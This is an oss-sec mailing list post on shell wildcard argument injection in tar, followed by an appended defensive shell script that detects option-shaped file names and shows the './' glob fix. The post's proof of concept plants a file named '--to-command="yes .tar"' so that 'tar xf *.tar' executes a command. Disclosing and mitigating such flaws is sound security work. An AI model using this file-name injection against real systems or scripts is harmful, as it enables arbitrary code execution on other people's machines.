oss-sec mailing list archives

Shell wildcards considered dangerous?


From: Georgi Guninski <gguninski () gmail com>
Date: Mon, 9 Dec 2019 15:23:16 +0200

Remote version of this affects wu-ftpd from 2003:
https://www.debian.org/security/2003/dsa-377

Summary:  For trusted command PROGRAM, executing
PROGRAM *.EXT
may lead to arbitrary code execution, e.g. for
PROGRAM=EXT=tar

The main idea is using the wildcard to add program options.

Open problem:

Are popular programs other than tar vulnerable?

Since shell wildcards are unlikely to change, should best practice
include not using *.EXT in shell?


Example exploit vector: starting program in untrusted
directories.

PoC:
====
$ rm -rf /tmp/1 ; mkdir /tmp/1 ; cd /tmp/1 ; tar cf a.tar /etc/issue
$ : >  --to-command="yes .tar"

# end of setup; the PoC starts here
tar xf *.tar

# output: .tar (repeats)
====


-- 
CV:    https://j.ludost.net/resumegg.pdf
site:  http://www.guninski.com
blog:  https://j.ludost.net/blog
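An added shell example, not from the original post: it rebuilds the PoC's directory layout with empty placeholder files (constructed here, not real archives), shows a check that flags a wildcard expansion containing option-shaped names, and the `./` prefix that removes the problem no matter which name the glob lists first (that order depends on locale collation).

```shell
#!/bin/sh
# Added illustration, not code from the original post. Assumes POSIX sh and
# mktemp only; the files it creates are empty placeholders, not archives.

# Build the scratch layout: one ordinary archive name and one file whose
# name is a tar option. Prints the directory path.
make_demo_dir() {
    dir=$(mktemp -d) || return 1
    : > "$dir/a.tar"
    : > "$dir/--to-command=yes .tar"   # the option-shaped name from the PoC
    printf '%s\n' "$dir"
}

# Check: does `*.EXT` in DIR expand to any name that starts with '-'?
# Returns 0 (true) if so, 1 otherwise (also 1 when nothing matches).
# Whether such a name lands first or last in the expansion depends on the
# locale's collation rules, so a script must never rely on the order.
glob_has_option_like_name() {
    ( cd "$1" || exit 1
      for f in *."$2"; do
          [ -e "$f" ] || exit 1          # pattern matched nothing
          case $f in -*) exit 0 ;; esac
      done
      exit 1 )
}

# The fix: expand with a ./ prefix so no match can begin with '-', and print
# the arguments one per line exactly as they would be passed to the program.
# `tar xf ./*.tar` (or `tar xf -- *.tar`) is the corresponding safe call.
safe_glob_args() {
    ( cd "$1" || exit 1
      set -- ./*."$2"
      [ -e "$1" ] || exit 1
      printf '%s\n' "$@" )
}

# Stand-alone run: report on a freshly built demo directory, then clean up.
if [ "${0##*/}" != "sh" ] && [ -z "$WILDCARD_DEMO_NO_MAIN" ]; then
    demo=$(make_demo_dir) || exit 1
    if glob_has_option_like_name "$demo" tar; then
        echo "unsafe: '*.tar' in $demo expands to an option-shaped name" >&2
    fi
    echo "safe argument list:"
    safe_glob_args "$demo" tar
    rm -rf "$demo"
fi
```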

